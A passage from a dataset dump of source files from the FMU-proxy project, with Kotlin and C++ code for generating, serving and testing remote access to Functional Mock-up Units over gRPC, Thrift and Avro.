IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelDescriptionParser\nimport no.mechatronics.sfi.fmuproxy.codegen.ProtoGen\nimport no.mechatronics.sfi.fmuproxy.codegen.ServerGen\nimport no.mechatronics.sfi.fmuproxy.utils.copyZippedContent\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.io.FileInputStream\nimport java.io.FileOutputStream\nimport java.io.InputStream\nimport java.nio.file.Files\n\n\nconst val PACKAGE_NAME = \"no.mechatronics.sfi.fmuproxy\"\nconst val KOTLIN_SRC_OUTPUT_FOLDER = \"src/main/kotlin/\"\nconst val PROTO_SRC_OUTPUT_FOLDER = \"src/main/proto/\"\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nclass ExecutableGenerator(\n private val inputStream: InputStream,\n private val modelDescriptionXml: String\n) {\n\n constructor(file: File): this(FileInputStream(file), ModelDescriptionParser.extractModelDescriptionXml(FileInputStream(file)))\n\n @JvmOverloads\n fun generate(outDir: File? = null) {\n\n @Suppress(\"NAME_SHADOWING\")\n val outDir: File = outDir ?: File(defaultOut)\n\n val modelDescription = ModelDescriptionParser.parse(modelDescriptionXml)\n //val tempDir = Files.createTempDirectory(\"fmuproxy\").toFile()\n\n val baseFile = File(modelDescription.modelName).apply {\n if (!exists() && mkdir()) {\n LOG.debug(\"Created folder $absolutePath\")\n }\n }\n\n try {\n\n \"build.gradle\".also { name ->\n File(baseFile, name).also { file ->\n FileOutputStream(file).use { fos ->\n javaClass.classLoader.getResourceAsStream(name).use { resource ->\n resource.copyTo(fos)\n }\n LOG.debug(\"Copied $name to $file\")\n }\n }\n }\n\n File(baseFile, \"settings.gradle\").also { file ->\n file.createNewFile()\n }\n\n copyZippedContent(baseFile, javaClass.classLoader.getResourceAsStream(\"gradlew.zip\"))\n\n val resourcesFile = File(baseFile,\"src/main/resources/\").apply {\n if (!exists()) {\n Files.createDirectories(this.toPath())\n }\n }\n\n File(resourcesFile, \"modelDescription.xml\").also { file ->\n file.writeText(modelDescriptionXml)\n }\n\n \"log4j.properties\".also { name ->\n File(resourcesFile, name).also { file ->\n FileOutputStream(file).use { fos ->\n javaClass.classLoader.getResourceAsStream(name).use { resource ->\n resource.copyTo(fos)\n }\n LOG.debug(\"Copied $name to $file\")\n }\n }\n }\n\n File(resourcesFile, \"${modelDescription.modelName}.fmu\").also { file ->\n FileOutputStream(file).use { fos ->\n inputStream.use { it.copyTo(fos) }\n }\n }\n\n ProtoGen.generateProtoCode(modelDescription, baseFile)\n ServerGen.generateServerCode(modelDescription, baseFile)\n\n ProcessBuilder()\n .directory(baseFile)\n .command(\"${baseFile.absolutePath}/gradlew.bat\", \"shadowJar\")\n .redirectError(ProcessBuilder.Redirect.INHERIT)\n .redirectOutput(ProcessBuilder.Redirect.INHERIT)\n .start()\n .waitFor().also {status ->\n\n if (status == 0) {\n val fileName = \"${modelDescription.modelName}.jar\"\n File(baseFile, \"build/libs/$fileName\").apply {\n if (exists()) {\n val target = File(outDir, fileName)\n copyTo(target, overwrite = true)\n LOG.info(\"Executable '$name' is located here: '$target'\")\n }\n }\n } else {\n LOG.error(\"Process returned with status: $status\")\n }\n }\n } finally {\n if 
(baseFile.deleteRecursively()) {\n LOG.debug(\"Deleted temp folder: $baseFile\")\n } else {\n LOG.warn(\"Failed to delete folder: $baseFile\")\n }\n }\n\n }\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(ExecutableGenerator::class.java)\n\n private const val defaultOut = \".\"\n\n }\n\n}\n" }, { "alpha_fraction": 0.6711603403091431, "alphanum_fraction": 0.6803081631660461, "avg_line_length": 27.08108139038086, "blob_id": "8099b2bffef5480e37fe28b351b94f29112b13c6", "content_id": "3bed2338eb2d5186bb7bf369b304ac5301aaa70c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2077, "license_type": "permissive", "max_line_length": 104, "num_lines": 74, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/grpc/TestGrpcTorsionBar.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.grpc\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestGrpcTorsionBar {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestGrpcTorsionBar::class.java)\n }\n\n private val fmu: Fmu\n private val server: GrpcFmuServer\n private val client: GrpcFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/TorsionBar/TorsionBar.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = GrpcFmuServer(fmu)\n val port = server.start()\n\n client = GrpcFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.close()\n fmu.close()\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n val dt = 1E-3\n val stop = 2.0\n runInstance(instance, dt, stop).also {\n LOG.info(\"Duration=${it}ms\")\n }\n }\n\n }\n\n}" }, { "alpha_fraction": 0.7384279370307922, "alphanum_fraction": 0.7406113743782043, "avg_line_length": 31.027971267700195, "blob_id": "06b48fc84d709f3d502a14fd7dc8f93e811fad69", "content_id": "d93a74abb6b5d9ab6281317aeab7402ca76c32d8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4580, "license_type": "permissive", "max_line_length": 120, "num_lines": 143, "path": "/cpp/FMU-proxy/server/FmuServiceHandler.cpp", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 08.06.18.\n//\n\n#include \"../common/FmuWrapper.h\"\n#include \"FmuServiceHandler.h\"\n\nint id_gen = 0;\n\nusing namespace 
fmuproxy;\nusing namespace fmuproxy::thrift;\nusing namespace fmuproxy::server;\n\n::FmuServiceHandler::FmuServiceHandler(shared_ptr<FmuWrapper> fmu) {\n this->fmu = fmu;\n}\n\nvoid FmuServiceHandler::getModelDescriptionXml(std::string &_return) {\n _return = \"XML placeholder\";\n}\n\nvoid FmuServiceHandler::getModelDescription(ModelDescription &_return) {\n _return = *fmu->getModelDescription();\n}\n\nFmuId FmuServiceHandler::createInstanceFromCS() {\n shared_ptr<FmuInstance> instance = fmu->newInstance();\n FmuId my_id = id_gen++;\n fmus[my_id] = instance;\n cout << \"create instance with id=\" << my_id << endl;\n return my_id;\n}\n\nFmuId FmuServiceHandler::createInstanceFromME(const Solver &solver) {\n return 0;\n}\n\nbool FmuServiceHandler::canGetAndSetFMUstate(const FmuId fmu_id) {\n return false;\n}\n\ndouble FmuServiceHandler::getCurrentTime(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->getCurrentTime();\n}\n\nbool FmuServiceHandler::isTerminated(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->isTerminated();\n}\n\nStatus::type FmuServiceHandler::init(const FmuId fmu_id, const double start, const double stop) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->init(start, stop);\n return ::Status::OK_STATUS;\n}\n\nvoid FmuServiceHandler::step(StepResult &_return, const FmuId fmu_id, const double step_size) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->step(step_size, _return);\n}\n\nStatus::type FmuServiceHandler::terminate(const FmuId fmu_id) {\n shared_ptr<FmuInstance>instance = fmus[fmu_id];\n Status::type status = instance->terminate();\n fmus.erase(fmu_id);\n return status;\n}\n\nStatus::type FmuServiceHandler::reset(const FmuId fmu_id) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n return instance->reset();\n}\n\nvoid FmuServiceHandler::readInteger(IntegerRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getInteger(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadInteger(IntegerArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readReal(RealRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getReal(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadReal(RealArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readString(StringRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getString(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadString(StringArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nvoid FmuServiceHandler::readBoolean(BooleanRead &_return, const FmuId fmu_id, const ValueReference vr) {\n shared_ptr<FmuInstance> instance = fmus[fmu_id];\n instance->getBoolean(vr, _return);\n}\n\nvoid FmuServiceHandler::bulkReadBoolean(BooleanArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) {\n\n}\n\nStatus::type FmuServiceHandler::writeInteger(const FmuId fmu_id, const ValueReference vr, const int32_t value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::bulkWriteInteger(const FmuId fmu_id, const ValueReferences &vr, const IntArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeReal(const FmuId fmu_id, const 
ValueReference vr, const double value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::bulkWriteReal(const FmuId fmu_id, const ValueReferences &vr, const RealArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeString(const FmuId fmu_id, const ValueReference vr, const std::string &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type\nFmuServiceHandler::bulkWriteString(const FmuId fmu_id, const ValueReferences &vr, const StringArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type FmuServiceHandler::writeBoolean(const FmuId fmu_id, const ValueReference vr, const bool value) {\n return Status::type::DISCARD_STATUS;\n}\n\nStatus::type\nFmuServiceHandler::bulkWriteBoolean(const FmuId fmu_id, const ValueReferences &vr, const BooleanArray &value) {\n return Status::type::DISCARD_STATUS;\n}\n" }, { "alpha_fraction": 0.6466110348701477, "alphanum_fraction": 0.6484453678131104, "avg_line_length": 38.219425201416016, "blob_id": "46b1266eb459ca85c551071c198c937483af42dd", "content_id": "d10994ad37a4b12db22b552a99abc0c6b51f9aaf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 10903, "license_type": "permissive", "max_line_length": 102, "num_lines": 278, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/RpcFmuClient.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.AbstractTypedScalarVariable\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.Closeable\n\n\nabstract class RpcFmuClient: Closeable {\n\n protected companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(RpcFmuClient::class.java)\n\n val NAME_TO_VALUE_REF = mutableMapOf<String, Int>()\n\n internal object FmuInstances: ArrayList<FmuInstance>() {\n internal fun terminateAll() {\n forEach{ it.terminate() }\n }\n }\n }\n\n abstract val modelDescriptionXml: String\n abstract val modelDescription: CommonModelDescription\n\n protected abstract fun getCurrentTime(fmuId: Int): Double\n protected abstract fun isTerminated(fmuId: Int): Boolean\n protected abstract fun init(fmuId: Int, start: Double, stop: Double): FmiStatus\n protected abstract fun terminate(fmuId: Int): FmiStatus\n protected abstract fun step(fmuId: Int, stepSize: Double): Pair<Double, FmiStatus>\n protected abstract fun reset(fmuId: Int): FmiStatus\n\n internal abstract fun readInteger(fmuId: Int, vr: ValueReference): FmuIntegerRead\n internal abstract fun bulkReadInteger(fmuId: Int, vr: List<Int>): FmuIntegerArrayRead\n\n internal abstract fun readReal(fmuId: Int, vr: ValueReference): FmuRealRead\n internal abstract fun bulkReadReal(fmuId: Int, vr: List<Int>): FmuRealArrayRead\n\n internal abstract fun readString(fmuId: Int, vr: ValueReference): FmuStringRead\n internal abstract fun bulkReadString(fmuId: Int, vr: List<Int>): FmuStringArrayRead\n\n internal abstract fun readBoolean(fmuId: Int, vr: ValueReference): FmuBooleanRead\n internal abstract fun bulkReadBoolean(fmuId: Int, vr: List<Int>): FmuBooleanArrayRead\n\n internal abstract fun writeInteger(fmuId: Int, vr: ValueReference, value: Int): FmiStatus\n internal abstract fun bulkWriteInteger(fmuId: Int, vr: List<Int>, value: List<Int>): FmiStatus\n\n internal abstract fun writeReal(fmuId: Int, vr: ValueReference, value: Real): FmiStatus\n internal abstract fun bulkWriteReal(fmuId: Int, vr: List<Int>, value: List<Real>): FmiStatus\n\n internal abstract fun writeString(fmuId: Int, vr: ValueReference, value: String): FmiStatus\n internal abstract fun bulkWriteString(fmuId: Int, vr: List<Int>, value: List<String>): FmiStatus\n\n internal abstract fun writeBoolean(fmuId: Int, vr: ValueReference, value: Boolean): FmiStatus\n internal abstract fun bulkWriteBoolean(fmuId: Int, vr: List<Int>, value: List<Boolean>): FmiStatus\n\n protected abstract fun createInstanceFromCS(): Int\n protected abstract fun createInstanceFromME(solver: Solver): Int\n\n protected fun process(name: String): Int {\n return NAME_TO_VALUE_REF.getOrPut(name, {\n modelDescription.modelVariables.getValueReference(name)\n })\n }\n\n @JvmOverloads\n fun newInstance(solver: Solver? 
= null): FmuInstance {\n val fmuId = if(solver == null) {\n createInstanceFromCS()\n } else {\n createInstanceFromME(solver)\n }\n return FmuInstance(fmuId).also {\n FmuInstances.add(it)\n }\n }\n\n fun stop() {\n close()\n }\n\n override fun close() {\n LOG.info(\"Closing..\")\n FmuInstances.terminateAll()\n }\n\n inner class FmuInstance(\n private val fmuId: Int\n ): FmiSimulation, FmuVariableAccessor {\n\n override val isTerminated: Boolean\n get() = isTerminated(fmuId)\n\n override val variableAccessor = this\n\n override var isInitialized = false\n private set\n\n override var lastStatus = FmiStatus.NONE\n override var currentTime: Double = 0.0\n\n override val modelDescription\n get() = [email protected]\n\n init {\n currentTime = getCurrentTime(fmuId)\n modelDescription.modelVariables.forEach { variable ->\n if (variable is AbstractTypedScalarVariable<*>) {\n variable::class.java.getField(\"accessor\").also { field ->\n field.set(variable, variableAccessor)\n }\n }\n }\n }\n\n override fun init() = init(0.0)\n override fun init(start: Double) = init(start, 0.0)\n override fun init(start: Double, stop: Double) {\n init(fmuId, start, stop).also {\n lastStatus = it\n isInitialized = true\n }\n }\n\n override fun doStep(stepSize: Double): Boolean {\n val stepResult = step(fmuId, stepSize)\n currentTime = stepResult.first\n lastStatus = stepResult.second\n return lastStatus == FmiStatus.OK\n }\n\n override fun terminate(): Boolean {\n return try {\n terminate(fmuId).also {\n lastStatus = it\n } == FmiStatus.OK\n } finally {\n FmuInstances.remove(this)\n }\n }\n\n override fun reset(): Boolean {\n return reset(fmuId).also {\n lastStatus = it\n } == FmiStatus.OK\n }\n\n override fun close() {\n terminate()\n }\n\n override fun readBoolean(name: String)\n = readBoolean(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReference)\n = readBoolean(fmuId, vr).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences)\n = bulkReadBoolean(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences, value: BooleanArray)\n = bulkReadBoolean(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readBoolean(vr: ValueReferences, value: IntArray)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readInteger(name: String)\n = readInteger(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReference)\n = readInteger(fmuId, vr).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReferences)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readInteger(vr: ValueReferences, value: IntArray)\n = bulkReadInteger(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readReal(name: String)\n = readReal(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReference)\n = readReal(fmuId, vr).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReferences)\n = bulkReadReal(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readReal(vr: ValueReferences, value: RealArray)\n = bulkReadReal(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun readString(name: String)\n = readString(fmuId, process(name)).also { lastStatus = it.status }\n\n override fun readString(vr: ValueReference)\n = readString(fmuId, vr).also { lastStatus = it.status }\n\n override fun 
readString(vr: ValueReferences)\n = bulkReadString(fmuId, vr.toList()).also { lastStatus = it.status }\n\n override fun readString(vr: ValueReferences, value: StringArray)\n = bulkReadString(fmuId, vr.toList()).also { lastStatus = it.status }\n\n\n override fun writeBoolean(name: String, value: Boolean)\n = writeBoolean(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReference, value: Boolean)\n = writeBoolean(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReferences, value: BooleanArray)\n = bulkWriteBoolean(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n override fun writeBoolean(vr: ValueReferences, value: IntArray)\n = bulkWriteBoolean(fmuId, vr.toList(), value.map { it != 0 })\n\n\n override fun writeInteger(name: String, value: Int)\n = writeInteger(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeInteger(vr: ValueReference, value: Int)\n = writeInteger(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeInteger(vr: ValueReferences, value: IntArray)\n = bulkWriteInteger(fmuId, vr.toList(), value.toList())\n\n\n override fun writeReal(name: String, value: Real)\n = writeReal(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeReal(vr: ValueReference, value: Real)\n = writeReal(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeReal(vr: ValueReferences, value: RealArray)\n = bulkWriteReal(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n\n override fun writeString(name: String, value: String)\n = writeString(fmuId, process(name), value).also { lastStatus = it }\n\n override fun writeString(vr: ValueReference, value: String)\n = writeString(fmuId, vr, value).also { lastStatus = it }\n\n override fun writeString(vr: ValueReferences, value: StringArray)\n = bulkWriteString(fmuId, vr.toList(), value.toList()).also { lastStatus = it }\n\n }\n\n}\n" }, { "alpha_fraction": 0.48769819736480713, "alphanum_fraction": 0.5177692770957947, "avg_line_length": 22.461538314819336, "blob_id": "6da53cf05450971d92b53bef90ba766557eea9ad", "content_id": "ca86bc792dbddeb959c6d87cebf9c74a1adc7c4b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1829, "license_type": "permissive", "max_line_length": 107, "num_lines": 78, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/TestCliParser.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmuproxy.cli.CommandLineParser\nimport org.junit.jupiter.api.Test\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\nimport java.net.MalformedURLException\nimport java.net.URL\n\nprivate const val fmuPath = \"jar:file:../../../test/HydraulicCylinder.jar!/HydraulicCylinder.fmu\"\n\nclass TestCliParser {\n\n companion object {\n val LOG: Logger = LoggerFactory.getLogger(TestCliParser::class.java)\n }\n\n @Test\n fun testPath() {\n\n File(fmuPath).let { file ->\n\n if (file.exists()) {\n Fmu.from(file)\n } else {\n try {\n Fmu.from(URL(fmuPath))\n } catch (ex: MalformedURLException) {\n LOG.error(\"Interpreted fmuPath as an URL, but an MalformedURLException was thrown\", ex)\n null\n }\n }\n\n }?.close()\n\n }\n\n @Test\n fun test1() {\n\n var args1 = arrayOf(\n \"--remote\", \"127.0.0.1:8888\",\n \"-grpc\", \"8000\")\n\n args1 += 
arrayOf(\"-fmu\", \"$fmuPath\")\n CommandLineParser.parse(args1)?.use { proxy ->\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n }\n\n @Test\n fun test2() {\n\n var args2 = arrayOf(\n \"--remote\", \"127.0.0.1:8888\",\n \"-thrift\", \"8001\",\n \"-jsonrpc/http\", \"8002\",\n \"-jsonrpc/ws\", \"8003\",\n \"-jsonrpc/tcp\", \"8004\",\n \"-jsonrpc/zmq\", \"8005\"\n )\n\n args2 += arrayOf(\"-fmu\", \"$fmuPath\")\n CommandLineParser.parse(args2)?.use { proxy ->\n\n proxy.start()\n LOG.info(\"${proxy.networkInfo}\")\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.713220477104187, "alphanum_fraction": 0.7144040465354919, "avg_line_length": 41.244998931884766, "blob_id": "4e690e40a813d80bc15189ad07c78418aae8e695", "content_id": "5cf9a25311287436d2671201262f89ab562a4007", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 8449, "license_type": "permissive", "max_line_length": 116, "num_lines": 200, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/avro/services/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.avro.services\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.avro.*\nimport no.mechatronics.sfi.fmuproxy.avro.ScalarVariable\n\ninternal fun FmuIntegerRead.avroType()\n = IntegerRead(value, status.avroType())\n\ninternal fun FmuRealRead.avroType()\n = RealRead(value, status.avroType())\n\ninternal fun FmuStringRead.avroType()\n = StringRead(value, status.avroType())\n\ninternal fun FmuBooleanRead.avroType()\n = BooleanRead(value, status.avroType())\n\ninternal fun FmuIntegerArrayRead.avroType()\n = IntegerArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuRealArrayRead.avroType()\n = RealArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuStringArrayRead.avroType()\n = StringArrayRead(value.toList(), status.avroType())\n\ninternal fun FmuBooleanArrayRead.avroType()\n = BooleanArrayRead(value.toList(), status.avroType())\n\ninternal fun IntegerVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun RealVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.RealAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.RealAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun StringVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.StringAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.StringAttribute().also { attribute ->\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun 
BooleanVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute().also { attribute ->\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun EnumerationVariable.avroType(): no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute {\n return no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute().also { attribute ->\n min?.also { attribute.min = it }\n max?.also { attribute.max = it }\n start?.also { attribute.start = it }\n }\n}\n\ninternal fun TypedScalarVariable<*>.avroType(): ScalarVariable {\n return no.mechatronics.sfi.fmuproxy.avro.ScalarVariable().also { v ->\n v.name = name\n v.valueReference = valueReference\n v.declaredType = declaredType\n description?.also { v.description = it }\n causality?.also { v.causality = it.avroType() }\n variability?.also { v.variability = it.avroType() }\n initial?.also { v.initial = it.avroType() }\n\n when (this) {\n is IntegerVariable -> v.attribute = this.avroType()\n is RealVariable -> v.attribute = this.avroType()\n is StringVariable -> v.attribute = this.avroType()\n is BooleanVariable -> v.attribute = this.avroType()\n is EnumerationVariable -> v.attribute = this.avroType()\n else -> throw AssertionError()\n }\n\n }\n}\n\ninternal fun ModelVariables.avroType(): List<ScalarVariable> {\n return map { it.avroType() }\n}\n\ninternal fun Unknown.avroType(): no.mechatronics.sfi.fmuproxy.avro.Unknown {\n return no.mechatronics.sfi.fmuproxy.avro.Unknown().also { u ->\n u.index = index\n u.dependencies = dependencies\n dependenciesKind?.also { u.dependenciesKind = it.avroType() }\n }\n}\n\ninternal fun ModelStructure.avroType(): no.mechatronics.sfi.fmuproxy.avro.ModelStructure {\n return no.mechatronics.sfi.fmuproxy.avro.ModelStructure().also { ms ->\n ms.outputs = outputs.map { it.avroType() }\n ms.derivatives = derivatives.map { it.avroType() }\n ms.initialUnknowns = initialUnknowns.map { it.avroType() }\n }\n}\n\nfun DefaultExperiment.avroType(): no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment {\n return no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment().also {\n it.startTime = startTime\n it.stopTime = stopTime\n it.tolerance = tolerance\n it.stepSize = stepSize\n }\n}\n\ninternal fun CommonModelDescription.avroType(): ModelDescription {\n return ModelDescription().also { md ->\n\n md.guid = guid\n md.modelName = modelName\n md.fmiVersion = fmiVersion\n md.modelVariables = modelVariables.avroType()\n md.modelStructure = modelStructure.avroType()\n\n version?.also { md.version = it }\n license?.also { md.license = it }\n copyright?.also { md.copyright = it }\n author?.also { md.author = it }\n description?.also { md.description = it }\n generationTool?.also { md.generationTool = it }\n generationDateAndTime?.also { md.generationDateAndTime = it }\n defaultExperiment?.also { md.defaultExperiment = it.avroType() }\n\n }\n}\n\ninternal fun Causality.avroType(): no.mechatronics.sfi.fmuproxy.avro.Causality {\n return when(this) {\n Causality.INPUT -> no.mechatronics.sfi.fmuproxy.avro.Causality.INPUT_CAUSALITY\n Causality.OUTPUT -> no.mechatronics.sfi.fmuproxy.avro.Causality.OUTPUT_CAUSALITY\n 